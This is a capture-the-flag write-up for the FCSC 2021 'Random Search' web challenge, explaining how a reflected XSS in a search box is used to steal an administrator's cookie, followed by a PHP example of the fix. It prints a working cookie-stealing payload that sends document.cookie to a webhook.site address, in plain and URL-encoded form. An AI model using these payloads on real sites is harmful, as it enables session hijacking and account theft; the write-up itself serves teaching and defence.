FCSC 2021 - Intro - Random Search

May 03, 2021   
web writeup 


Challenge

Can you steal the cookie of the administrator who visits the pages?

http://challenges2.france-cybersecurity-challenge.fr:5001/


Solving the challenge

While exploring the site's features, we notice a contact page that lets us report a vulnerability to the site administrators.

This is very interesting because it could enable a Cross-Site Scripting (XSS) attack to retrieve the administrator's cookies.

First, we need to find an input vulnerable to XSS. Bingo, the search box does not filter user data and allows XSS. If we enter this payload in the search bar:

<script>alert(1)</script>

We get an XSS:

We are therefore going to create a payload to exfiltrate the cookies of the browser that visits the page. To do so, I used the site webhook.site, which receives HTTP requests and is therefore very useful for exfiltrating cookies. To force the browser to navigate to another page, we just change the value of the window.location variable in JavaScript like this:

<script>
window.location="https://webhook.site/ca1e06eb-8390-41d5-8f8b-0dff4baafcda/?c="+document.cookie
</script>

Then we have to URL-encode the payload and place it in the search parameter of the GET request, in the URL (the URL below decodes to an equivalent <img src=x onerror=...> form of the same redirect):

http://challenges2.france-cybersecurity-challenge.fr:5001/index.php?search=%3Cimg+src%3Dx+onerror%3D%27window.location%3D%22https%3A%2F%2Fwebhook.site%2Fca1e06eb-8390-41d5-8f8b-0dff4baafcda%2F%3Fc%3D%22%2Bdocument.cookie%27%3E

Then we send this URL to the administrator via the contact form for reporting a vulnerability, and we just have to wait for the administrator to open our link.

A few minutes later, we see a request appear on webhook.site:

And we see the flag in the exfiltrated cookies:

FCSC{4e0451cc88a9a96e7e46947461382008d8c8f4304373b8907964675c27d7c633}
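
On the defensive side, the chain above depends on two things: the search term is reflected into the page without encoding, and the cookie is readable through document.cookie. The following is an added example, not the challenge's source code (the writeup does not show it), putting the vulnerable rendering beside a hardened one. The function names, the "Results for" markup, the cookie name `session` and an HTTPS deployment are assumptions.

```php
<?php
declare(strict_types=1);
// Added example: hypothetical reconstruction, not the challenge's source.

// Vulnerable: the raw search term is concatenated into the HTML response.
function render_results_vulnerable(string $search): string
{
    return '<p>Results for: ' . $search . '</p>';
}

// Hardened: encode for the HTML context so markup arrives as inert text.
function render_results_hardened(string $search): string
{
    $flags = ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5;
    return '<p>Results for: ' . htmlspecialchars($search, $flags, 'UTF-8') . '</p>';
}

// Cookie attributes that keep the value out of document.cookie.
// 'secure' assumes the site is served over HTTPS.
function session_cookie_options(): array
{
    return ['expires' => 0, 'path' => '/', 'secure' => true,
            'httponly' => true, 'samesite' => 'Strict'];
}

if (PHP_SAPI !== 'cli') {
    // Web request. The CSP is defence in depth: with script-src 'self',
    // inline <script> blocks and inline event handlers do not execute.
    header("Content-Security-Policy: default-src 'self'; script-src 'self'");
    if (!isset($_COOKIE['session'])) {
        setcookie('session', bin2hex(random_bytes(16)), session_cookie_options());
    }
    $q = $_GET['search'] ?? '';
    // search[]=... arrives as an array; treat anything but a string as empty.
    echo render_results_hardened(is_string($q) ? $q : '');
} else {
    // Command line: compare both renderings on the writeup's test payload
    // and on a constructed event-handler variant.
    $samples = ['<script>alert(1)</script>', '<img src=x onerror=\'alert(1)\'>'];
    foreach ($samples as $s) {
        echo "input:      $s\n";
        echo 'vulnerable: ' . render_results_vulnerable($s) . "\n";
        echo 'hardened:   ' . render_results_hardened($s) . "\n\n";
    }
}
```

Output encoding is the actual fix for the search box. The HttpOnly cookie and the CSP header limit the damage if another injection point is missed.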